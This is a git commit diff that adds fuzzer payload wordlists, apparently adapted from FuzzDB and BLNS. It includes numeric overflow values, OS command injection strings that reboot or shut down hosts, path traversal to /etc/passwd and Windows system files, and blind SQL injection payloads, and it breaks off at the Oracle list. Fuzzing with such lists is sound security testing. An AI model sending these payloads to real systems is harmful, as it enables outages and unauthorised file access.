Folder removed

2026-03-26 03:11:15 +01:00 · 2019-11-20 18:49:01 +01:00
parent 4ea29e2464
commit 955bddda2f
54 changed files with 163 additions and 163 deletions
--- a/fuzzer/payloads/lists/numeric/blns-numeric.txt
+++ b/fuzzer/payloads/lists/numeric/blns-numeric.txt
@@ -0,0 +1,72 @@
+# Source: BLNS (https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt)
+0
+1
+1.00
+$1.00
+1/2
+1E2
+1E02
+1E+02
+-1
+-1.00
+-$1.00
+-1/2
+-1E2
+-1E02
+-1E+02
+1/0
+0/0
+-2147483648/-1
+-9223372036854775808/-1
+-0
+-0.0
+0
+0.0
+0.00
+0..0
+.
+0.0.0
+0,00
+0,,0
+,
+0,0,0
+0.0/0
+1.0/0.0
+0.0/0.0
+1,0/0,0
+0,0/0,0
+--1
+-
+-.
+-,
+999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
+NaN
+Infinity
+-Infinity
+INF
+1#INF
+-1#IND
+1#QNAN
+1#SNAN
+1#IND
+0x0
+0xffffffff
+0xffffffffffffffff
+0xabad1dea
+123456789012345678901234567890123456789
+1,000.00
+1 000.00
+1'000.00
+1,000,000.00
+1 000 000.00
+1'000'000.00
+1.000,00
+1 000,00
+1'000,00
+1.000.000,00
+1 000 000,00
+1'000'000,00
+01000
+08
+09
+2.2250738585072011e-308
--- a/fuzzer/payloads/lists/numeric/overflows.txt
+++ b/fuzzer/payloads/lists/numeric/overflows.txt
@@ -0,0 +1,155 @@
+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/integer-overflow/integer-overflows.txt)
+-1
+0
+0x100
+0x1000
+0x3fffffff
+0x7ffffffe
+0x7fffffff
+0x80000000
+0xfffffffe
+0xffffffff
+0x10000
+0x100000
+
+100
+1000
+3fffffff
+7ffffffe
+7fffffff
+80000000
+fffffffe
+ffffffff
+10000
+100000
+
+256
+4096
+1073741823
+2147483646
+2147483647
+2147483648
+4294967294
+4294967295
+65536
+1048576
+
+
+# Custom overflows
+# UNSIGNED
+# 8b -> 255
+255
+0xff
+ff
+11111111
+0b11111111
+
+# 8b -> 256
+256
+0x100
+100
+100000000
+0b100000000
+
+# 8b -> 257
+257
+0x101
+101
+100000001
+0b100000001
+
+# 16b -> 65535
+65535
+0xffff
+ffff
+1111111111111111
+0b1111111111111111
+
+# 16b -> 65536
+65536
+0x10000
+10000
+10000000000000000
+0b10000000000000000
+
+# 16b -> 65537
+65537
+0x10001
+10001
+10000000000000001
+0b10000000000000001
+
+# 32b -> 4294967295
+4294967295
+0xffffffff
+ffffffff
+11111111111111111111111111111111
+0b11111111111111111111111111111111
+
+# 32b -> 4294967296
+4294967296
+0x100000000
+100000000
+100000000000000000000000000000000
+0b100000000000000000000000000000000
+
+# 32b -> 4294967297
+4294967297
+0x100000001
+100000001
+100000000000000000000000000000001
+0b100000000000000000000000000000001
+
+# 64b -> 18446744073709551615
+18446744073709551615
+0xffffffffffffffff
+ffffffffffffffff
+1111111111111111111111111111111111111111111111111111111111111111
+0b1111111111111111111111111111111111111111111111111111111111111111
+
+# 64b -> 18446744073709551616
+18446744073709551616
+0x10000000000000000
+10000000000000000
+10000000000000000000000000000000000000000000000000000000000000000
+0b10000000000000000000000000000000000000000000000000000000000000000
+
+# 64b -> 18446744073709551617
+18446744073709551617
+0x10000000000000001
+10000000000000001
+10000000000000000000000000000000000000000000000000000000000000001
+0b10000000000000000000000000000000000000000000000000000000000000001
+
+# SIGNED (just in decimal)
+# 8b -> 127
+127
+126
+128
+-127
+-128
+-129
+
+# 16b -> 32767
+32767
+32766
+32768
+-32767
+-32769
+-32768
+
+# 32b -> 2147483647
+2147483647
+2147483646
+2147483648
+-2147483647
+-2147483649
+-2147483648
+
+# 64b -> 9223372036854775808
+9223372036854775808
+9223372036854775807
+9223372036854775809
+-9223372036854775808
+-9223372036854775810
+-9223372036854775809
--- a/fuzzer/payloads/lists/numeric/reserver-numeric-keywords.txt
+++ b/fuzzer/payloads/lists/numeric/reserver-numeric-keywords.txt
@@ -0,0 +1,2 @@
+NaN
+inf
--- a/fuzzer/payloads/lists/os-command-injection/unix-injections.txt
+++ b/fuzzer/payloads/lists/os-command-injection/unix-injections.txt
@@ -0,0 +1,175 @@
+# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt)
+
+reboot
+;reboot
+;reboot;
+^reboot
+|reboot
+<reboot
+<reboot;
+<reboot\n
+<reboot%0D
+<reboot%0A
+&reboot
+&reboot&
+&&reboot
+&&reboot&&
+%0Dreboot
+%0Dreboot%0D
+%0Areboot
+%0Areboot%0A
+\nreboot
+\nreboot\n
+'reboot'
+`reboot`
+;reboot|
+;reboot/n
+|reboot;
+a);reboot
+a;reboot
+a);reboot
+a;reboot;
+a);reboot|
+FAIL||reboot
+CMD=$'reboot';$CMD
+;CMD=$'reboot';$CMD
+^CMD=$'reboot';$CMD
+|CMD=$'reboot';$CMD
+&CMD=$'reboot';$CMD
+&&CMD=$'reboot';$CMD
+%0DCMD=$'reboot';$CMD
+FAIL||CMD=$'reboot';$CMD
+CMD=$\'reboot\';$CMD
+;CMD=$\'reboot\';$CMD
+^CMD=$\'reboot\';$CMD
+|CMD=$\'reboot\';$CMD
+&CMD=$\'reboot\';$CMD
+&&CMD=$\'reboot\';$CMD
+%0DCMD=$\'reboot\';$CMD
+FAIL||CMD=$\'reboot\';$CMD
+CMD=$"reboot";$CMD
+;CMD=$"reboot";$CMD
+^CMD=$"reboot";$CMD
+|CMD=$"reboot";$CMD
+&CMD=$"reboot";$CMD
+&&CMD=$"reboot";$CMD
+%0DCMD=$"reboot";$CMD
+FAIL||CMD=$"reboot";$CMD
+<!--#exec cmd="reboot"-->
+;system('reboot')
+
+shutdown
+;shutdown
+;shutdown;
+^shutdown
+|shutdown
+<shutdown
+<shutdown;
+<shutdown\n
+<shutdown%0D
+<shutdown%0A
+&shutdown
+&shutdown&
+&&shutdown
+&&shutdown&&
+%0Dshutdown
+%0Dshutdown%0D
+%0Ashutdown
+%0Ashutdown%0A
+\nshutdown
+\nshutdown\n
+'shutdown'
+`shutdown`
+;shutdown|
+;shutdown/n
+|shutdown;
+a);shutdown
+a;shutdown
+a);shutdown
+a;shutdown;
+a);shutdown|
+FAIL||shutdown
+CMD=$'shutdown';$CMD
+;CMD=$'shutdown';$CMD
+^CMD=$'shutdown';$CMD
+|CMD=$'shutdown';$CMD
+&CMD=$'shutdown';$CMD
+&&CMD=$'shutdown';$CMD
+%0DCMD=$'shutdown';$CMD
+FAIL||CMD=$'shutdown';$CMD
+CMD=$\'shutdown\';$CMD
+;CMD=$\'shutdown\';$CMD
+^CMD=$\'shutdown\';$CMD
+|CMD=$\'shutdown\';$CMD
+&CMD=$\'shutdown\';$CMD
+&&CMD=$\'shutdown\';$CMD
+%0DCMD=$\'shutdown\';$CMD
+FAIL||CMD=$\'shutdown\';$CMD
+CMD=$"shutdown";$CMD
+;CMD=$"shutdown";$CMD
+^CMD=$"shutdown";$CMD
+|CMD=$"shutdown";$CMD
+&CMD=$"shutdown";$CMD
+&&CMD=$"shutdown";$CMD
+%0DCMD=$"shutdown";$CMD
+FAIL||CMD=$"shutdown";$CMD
+<!--#exec cmd="shutdown"-->
+;system('shutdown')
+
+sleep 20000
+;sleep 20000
+;sleep 20000;
+^sleep 20000
+|sleep 20000
+<sleep 20000
+<sleep 20000;
+<sleep 20000\n
+<sleep 20000%0D
+<sleep 20000%0A
+&sleep 20000
+&sleep 20000&
+&&sleep 20000
+&&sleep 20000&&
+%0Dsleep 20000
+%0Dsleep 20000%0D
+%0Asleep 20000
+%0Asleep 20000%0A
+\nsleep 20000
+\nsleep 20000\n
+'sleep 20000'
+`sleep 20000`
+;sleep 20000|
+;sleep 20000/n
+|sleep 20000;
+a);sleep 20000
+a;sleep 20000
+a);sleep 20000
+a;sleep 20000;
+a);sleep 20000|
+FAIL||sleep 20000
+CMD=$'sleep 20000';$CMD
+;CMD=$'sleep 20000';$CMD
+^CMD=$'sleep 20000';$CMD
+|CMD=$'sleep 20000';$CMD
+&CMD=$'sleep 20000';$CMD
+&&CMD=$'sleep 20000';$CMD
+%0DCMD=$'sleep 20000';$CMD
+FAIL||CMD=$'sleep 20000';$CMD
+CMD=$\'sleep 20000\';$CMD
+;CMD=$\'sleep 20000\';$CMD
+^CMD=$\'sleep 20000\';$CMD
+|CMD=$\'sleep 20000\';$CMD
+&CMD=$\'sleep 20000\';$CMD
+&&CMD=$\'sleep 20000\';$CMD
+%0DCMD=$\'sleep 20000\';$CMD
+FAIL||CMD=$\'sleep 20000\';$CMD
+CMD=$"sleep 20000";$CMD
+;CMD=$"sleep 20000";$CMD
+^CMD=$"sleep 20000";$CMD
+|CMD=$"sleep 20000";$CMD
+&CMD=$"sleep 20000";$CMD
+&&CMD=$"sleep 20000";$CMD
+%0DCMD=$"sleep 20000";$CMD
+FAIL||CMD=$"sleep 20000";$CMD
+<!--#exec cmd="sleep 20000"-->
+;system('sleep 20000')
--- a/fuzzer/payloads/lists/os-command-injection/windows-injections.txt
+++ b/fuzzer/payloads/lists/os-command-injection/windows-injections.txt
@@ -0,0 +1,117 @@
+# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt)
+
+timeout 20000
+;timeout 20000
+;timeout 20000;
+^timeout 20000
+|timeout 20000
+<timeout 20000
+<timeout 20000;
+<timeout 20000\n
+<timeout 20000%0D
+<timeout 20000%0A
+&timeout 20000
+&timeout 20000&
+&&timeout 20000
+&&timeout 20000&&
+%0Dtimeout 20000
+%0Dtimeout 20000%0D
+%0Atimeout 20000
+%0Atimeout 20000%0A
+\ntimeout 20000
+\ntimeout 20000\n
+'timeout 20000'
+`timeout 20000`
+;timeout 20000|
+;timeout 20000/n
+|timeout 20000;
+a);timeout 20000
+a;timeout 20000
+a);timeout 20000
+a;timeout 20000;
+a);timeout 20000|
+FAIL||timeout 20000
+CMD=$'timeout 20000';$CMD
+;CMD=$'timeout 20000';$CMD
+^CMD=$'timeout 20000';$CMD
+|CMD=$'timeout 20000';$CMD
+&CMD=$'timeout 20000';$CMD
+&&CMD=$'timeout 20000';$CMD
+%0DCMD=$'timeout 20000';$CMD
+FAIL||CMD=$'timeout 20000';$CMD
+CMD=$\'timeout 20000\';$CMD
+;CMD=$\'timeout 20000\';$CMD
+^CMD=$\'timeout 20000\';$CMD
+|CMD=$\'timeout 20000\';$CMD
+&CMD=$\'timeout 20000\';$CMD
+&&CMD=$\'timeout 20000\';$CMD
+%0DCMD=$\'timeout 20000\';$CMD
+FAIL||CMD=$\'timeout 20000\';$CMD
+CMD=$"timeout 20000";$CMD
+;CMD=$"timeout 20000";$CMD
+^CMD=$"timeout 20000";$CMD
+|CMD=$"timeout 20000";$CMD
+&CMD=$"timeout 20000";$CMD
+&&CMD=$"timeout 20000";$CMD
+%0DCMD=$"timeout 20000";$CMD
+FAIL||CMD=$"timeout 20000";$CMD
+<!--#exec cmd="timeout 20000"-->
+;system('timeout 20000')
+
+shutdown -h now
+;shutdown -h now
+;shutdown -h now;
+^shutdown -h now
+|shutdown -h now
+<shutdown -h now
+<shutdown -h now;
+<shutdown -h now\n
+<shutdown -h now%0D
+<shutdown -h now%0A
+&shutdown -h now
+&shutdown -h now&
+&&shutdown -h now
+&&shutdown -h now&&
+%0Dshutdown -h now
+%0Dshutdown -h now%0D
+%0Ashutdown -h now
+%0Ashutdown -h now%0A
+\nshutdown -h now
+\nshutdown -h now\n
+'shutdown -h now'
+`shutdown -h now`
+;shutdown -h now|
+;shutdown -h now/n
+|shutdown -h now;
+a);shutdown -h now
+a;shutdown -h now
+a);shutdown -h now
+a;shutdown -h now;
+a);shutdown -h now|
+FAIL||shutdown -h now
+CMD=$'shutdown -h now';$CMD
+;CMD=$'shutdown -h now';$CMD
+^CMD=$'shutdown -h now';$CMD
+|CMD=$'shutdown -h now';$CMD
+&CMD=$'shutdown -h now';$CMD
+&&CMD=$'shutdown -h now';$CMD
+%0DCMD=$'shutdown -h now';$CMD
+FAIL||CMD=$'shutdown -h now';$CMD
+CMD=$\'shutdown -h now\';$CMD
+;CMD=$\'shutdown -h now\';$CMD
+^CMD=$\'shutdown -h now\';$CMD
+|CMD=$\'shutdown -h now\';$CMD
+&CMD=$\'shutdown -h now\';$CMD
+&&CMD=$\'shutdown -h now\';$CMD
+%0DCMD=$\'shutdown -h now\';$CMD
+FAIL||CMD=$\'shutdown -h now\';$CMD
+CMD=$"shutdown -h now";$CMD
+;CMD=$"shutdown -h now";$CMD
+^CMD=$"shutdown -h now";$CMD
+|CMD=$"shutdown -h now";$CMD
+&CMD=$"shutdown -h now";$CMD
+&&CMD=$"shutdown -h now";$CMD
+%0DCMD=$"shutdown -h now";$CMD
+FAIL||CMD=$"shutdown -h now";$CMD
+<!--#exec cmd="shutdown -h now"-->
+;system('shutdown -h now')
--- a/fuzzer/payloads/lists/path-traversal/existing-files-unix.txt
+++ b/fuzzer/payloads/lists/path-traversal/existing-files-unix.txt
@@ -0,0 +1,16 @@
+# RELATIVE PATHS
+../../../../../../../../../../../../../../../../../apache/logs/access.log
+../../../../../../../../../../../../../../../../../etc/passwd
+../../../../../../../../../../../../../../../../../apache/logs/
+../../../../../../../../../../../../../../../../../etc/
+../../../../../../../../../../../../../../../../../opt/
+../../../../../../../../../../../../../../../../../var/
+
+
+# ABSOLUTE PATHS
+/apache/logs/access.log
+/etc/passwd
+/apache/logs/
+/etc/
+/opt/
+/var/
--- a/fuzzer/payloads/lists/path-traversal/existing-files-windows.txt
+++ b/fuzzer/payloads/lists/path-traversal/existing-files-windows.txt
@@ -0,0 +1,23 @@
+# RELATIVE PATHS
+../../../../../../../../../../../../../../../../../boot.ini
+..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
+
+../../../../../../../../../../../../../../../../../
+..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
+
+../../../../../../../../../../../../../../../../../inetpub/wwwroot/index.asp
+..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\index.asp
+
+../../../../../../../../../../../../../../../../../inetpub/wwwroot/
+..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\
+
+# ABSOLUTE PATHS
+c:\boot.ini
+c:\
+c:\inetpub\wwwroot\index.asp
+c:\inetpub\
+c:\pagefile.sys
+c:\Windows\system.ini
+c:\Windows\
+c:\Windows\System32\drivers\etc\hosts
+c:\Windows\System32\drivers\etc\
--- a/fuzzer/payloads/lists/path-traversal/non-existing-files.txt
+++ b/fuzzer/payloads/lists/path-traversal/non-existing-files.txt
@@ -0,0 +1,12 @@
+# Generic relative paths
+../../../../../../../../../../../../../../../../../unknown/unknown.log
+..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\unknown/unknown.log
+
+../../../../../../../../../../../../../../../../../unknown
+..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\unknown
+
+# Windows absolute paths
+c:\unknown\unknown
+
+# UNIX absolute paths
+/unknown/unknown
--- a/fuzzer/payloads/lists/special-chars-generic/all-bytes-hex.txt
+++ b/fuzzer/payloads/lists/special-chars-generic/all-bytes-hex.txt
@@ -0,0 +1,257 @@
+# Generated
+%00
+%01
+%02
+%03
+%04
+%05
+%06
+%07
+%08
+%09
+%0a
+%0b
+%0c
+%0d
+%0e
+%0f
+%10
+%11
+%12
+%13
+%14
+%15
+%16
+%17
+%18
+%19
+%1a
+%1b
+%1c
+%1d
+%1e
+%1f
+%20
+%21
+%22
+%23
+%24
+%25
+%26
+%27
+%28
+%29
+%2a
+%2b
+%2c
+%2d
+%2e
+%2f
+%30
+%31
+%32
+%33
+%34
+%35
+%36
+%37
+%38
+%39
+%3a
+%3b
+%3c
+%3d
+%3e
+%3f
+%40
+%41
+%42
+%43
+%44
+%45
+%46
+%47
+%48
+%49
+%4a
+%4b
+%4c
+%4d
+%4e
+%4f
+%50
+%51
+%52
+%53
+%54
+%55
+%56
+%57
+%58
+%59
+%5a
+%5b
+%5c
+%5d
+%5e
+%5f
+%60
+%61
+%62
+%63
+%64
+%65
+%66
+%67
+%68
+%69
+%6a
+%6b
+%6c
+%6d
+%6e
+%6f
+%70
+%71
+%72
+%73
+%74
+%75
+%76
+%77
+%78
+%79
+%7a
+%7b
+%7c
+%7d
+%7e
+%7f
+%80
+%81
+%82
+%83
+%84
+%85
+%86
+%87
+%88
+%89
+%8a
+%8b
+%8c
+%8d
+%8e
+%8f
+%90
+%91
+%92
+%93
+%94
+%95
+%96
+%97
+%98
+%99
+%9a
+%9b
+%9c
+%9d
+%9e
+%9f
+%a0
+%a1
+%a2
+%a3
+%a4
+%a5
+%a6
+%a7
+%a8
+%a9
+%aa
+%ab
+%ac
+%ad
+%ae
+%af
+%b0
+%b1
+%b2
+%b3
+%b4
+%b5
+%b6
+%b7
+%b8
+%b9
+%ba
+%bb
+%bc
+%bd
+%be
+%bf
+%c0
+%c1
+%c2
+%c3
+%c4
+%c5
+%c6
+%c7
+%c8
+%c9
+%ca
+%cb
+%cc
+%cd
+%ce
+%cf
+%d0
+%d1
+%d2
+%d3
+%d4
+%d5
+%d6
+%d7
+%d8
+%d9
+%da
+%db
+%dc
+%dd
+%de
+%df
+%e0
+%e1
+%e2
+%e3
+%e4
+%e5
+%e6
+%e7
+%e8
+%e9
+%ea
+%eb
+%ec
+%ed
+%ee
+%ef
+%f0
+%f1
+%f2
+%f3
+%f4
+%f5
+%f6
+%f7
+%f8
+%f9
+%fa
+%fb
+%fc
+%fd
+%fe
+%ff
--- a/fuzzer/payloads/lists/special-chars-generic/all-bytes-raw.txt
+++ b/fuzzer/payloads/lists/special-chars-generic/all-bytes-raw.txt
@@ -0,0 +1,258 @@
+# Generated
+ 
+
+
+
+
+
+
+
+
+	
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
+!
+"
+#
+$
+%
+&
+'
+(
+)
+*
+
+,
+-
+.
+/
+0
+1
+2
+3
+4
+5
+6
+7
+8
+9
+:
+;
+<
+=
+>
+?
+@
+A
+B
+C
+D
+E
+F
+G
+H
+I
+J
+K
+L
+M
+N
+O
+P
+Q
+R
+S
+T
+U
+V
+W
+X
+Y
+Z
+[
+\
+]
+^
+_
+`
+a
+b
+c
+d
+e
+f
+g
+h
+i
+j
+k
+l
+m
+n
+o
+p
+q
+r
+s
+t
+u
+v
+w
+x
+y
+z
+{
+|
+}
+~
+
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
+<EFBFBD>
--- a/fuzzer/payloads/lists/special-chars-generic/long-strings.txt
+++ b/fuzzer/payloads/lists/special-chars-generic/long-strings.txt
--- a/fuzzer/payloads/lists/special-chars-generic/null-bytes.txt
+++ b/fuzzer/payloads/lists/special-chars-generic/null-bytes.txt
@@ -0,0 +1,57 @@
+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/control-chars/NullByteRepresentations.txt)
+%00
+%00%00
+\0
+\0\
+\00
+\00\
+\0\0
+\0\0\
+\0\0
+\00\00\
+\000
+\000\
+\0000
+\0000\
+\x00
+\x00\
+\x00\x00
+\x00\x00\
+\x0000
+\x0000\
+\x00000000
+\x00000000\
+\u0000
+\u0000\
+\u00000000
+\u00000000\
+\u0000\u0000
+\u0000\u0000\
+\z
+\z\
+NUL
+NULL
+nul
+null
+FALSE
+false
+0x00
+0x0000
+0x00000000
+&#0;
+&#x0;
+"\u0000"
+u"\u0000"
+0
+00
+0000
+00000000
+%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
+%C0%80
+%E0%80%80
+%F0%80%80%80
+%F8%80%80%80%80
+%FC%80%80%80%80%80
+%FE%80%80%80%80%80%80
+
+<EFBFBD>
--- a/fuzzer/payloads/lists/special-chars-generic/special-characters.txt
+++ b/fuzzer/payloads/lists/special-chars-generic/special-characters.txt
@@ -0,0 +1,33 @@
+.
+,
+
+-
+_
+;
+/
+|
+#
+<
+>
+?
+!
+\
+"
+'
+`
+*
+(
+)
+[
+]
+{
+}
+^
+~
+=
+@
+$
+&
+:
+%
+ 
--- a/fuzzer/payloads/lists/sql-injection/generic-blind.txt
+++ b/fuzzer/payloads/lists/sql-injection/generic-blind.txt
@@ -0,0 +1,34 @@
+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/GenericBlind.txt)
+
+sleep(200000)
+sleep(200000)#
+1 or sleep(200000)#
+" or sleep(200000)#
+' or sleep(200000)#
+" or sleep(200000)="
+' or sleep(200000)='
+1) or sleep(200000)#
+") or sleep(200000)="
+') or sleep(200000)='
+1)) or sleep(200000)#
+")) or sleep(200000)="
+')) or sleep(200000)='
+;waitfor delay '0:0:200000'--
+);waitfor delay '0:0:200000'--
+';waitfor delay '0:0:200000'--
+";waitfor delay '0:0:200000'--
+');waitfor delay '0:0:200000'--
+");waitfor delay '0:0:200000'--
+));waitfor delay '0:0:200000'--
+'));waitfor delay '0:0:200000'--
+"));waitfor delay '0:0:200000'--
+benchmark(1000000000,MD5(1))#
+1 or benchmark(1000000000,MD5(1))#
+" or benchmark(1000000000,MD5(1))#
+' or benchmark(1000000000,MD5(1))#
+1) or benchmark(1000000000,MD5(1))#
+") or benchmark(1000000000,MD5(1))#
+') or benchmark(1000000000,MD5(1))#
+1)) or benchmark(1000000000,MD5(1))#
+")) or benchmark(1000000000,MD5(1))#
+')) or benchmark(1000000000,MD5(1))#
--- a/fuzzer/payloads/lists/sql-injection/mssql-blind.txt
+++ b/fuzzer/payloads/lists/sql-injection/mssql-blind.txt
@@ -0,0 +1,52 @@
+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
+# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
+
+'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:200000' --
+'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:200000' --
+'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:200000' --
+'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:200000' --
+'; if not(select system_user) <> 'sa' waitfor delay '0:0:200000' --
+'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:200000' -- 
+'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:200000' --
+'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:200000' --
+
+ waitfor delay '0:0:200000' /* 
+ waitfor delay '0:0:200000' --
+' waitfor delay '0:0:200000' /* 
+' waitfor delay '0:0:200000' --
+" waitfor delay '0:0:200000' /* 
+" waitfor delay '0:0:200000' --
+) waitfor delay '0:0:200000' /* 
+) waitfor delay '0:0:200000' --
+)) waitfor delay '0:0:200000' /* 
+)) waitfor delay '0:0:200000' --
+))) waitfor delay '0:0:200000' /* 
+))) waitfor delay '0:0:200000' --
+)))) waitfor delay '0:0:200000' /* 
+)))) waitfor delay '0:0:200000' --
+))))) waitfor delay '0:0:200000' --
+)))))) waitfor delay '0:0:200000' --
+') waitfor delay '0:0:200000' /* 
+') waitfor delay '0:0:200000' --
+") waitfor delay '0:0:200000' /* 
+") waitfor delay '0:0:200000' --
+')) waitfor delay '0:0:200000' /* 
+')) waitfor delay '0:0:200000' --
+")) waitfor delay '0:0:200000' /* 
+")) waitfor delay '0:0:200000' --
+'))) waitfor delay '0:0:200000' /* 
+'))) waitfor delay '0:0:200000' --
+"))) waitfor delay '0:0:200000' /* 
+"))) waitfor delay '0:0:200000' --
+')))) waitfor delay '0:0:200000' /* 
+')))) waitfor delay '0:0:200000' --
+")))) waitfor delay '0:0:200000' /* 
+")))) waitfor delay '0:0:200000' --
+'))))) waitfor delay '0:0:200000' /* 
+'))))) waitfor delay '0:0:200000' --
+"))))) waitfor delay '0:0:200000' /* 
+"))))) waitfor delay '0:0:200000' --
+')))))) waitfor delay '0:0:200000' /* 
+')))))) waitfor delay '0:0:200000' --
+")))))) waitfor delay '0:0:200000' /* 
+")))))) waitfor delay '0:0:200000' --
--- a/fuzzer/payloads/lists/sql-injection/mysql-blind.txt
+++ b/fuzzer/payloads/lists/sql-injection/mysql-blind.txt
@@ -0,0 +1,22 @@
+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
+# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
+
+1
+1 and user_name() = 'dbo'
+\'; desc users; --
+1\'1
+1' and non_existant_table = '1
+' or username is not NULL or username = '
+1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
+1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
+1 uni/**/on select all from where
+
+1'1
+1 exec sp_ (or exec xp_)
+1 and 1=1
+1' and 1=(select count(*) from tablenames); --
+1 or 1=1
+1' or '1'='1
+1or1=1
+1'or'1'='1
+fake@ema'or'il.nl'='il.nl
--- a/fuzzer/payloads/lists/sql-injection/oracle-blind.txt
+++ b/fuzzer/payloads/lists/sql-injection/oracle-blind.txt
@@ -0,0 +1,58 @@
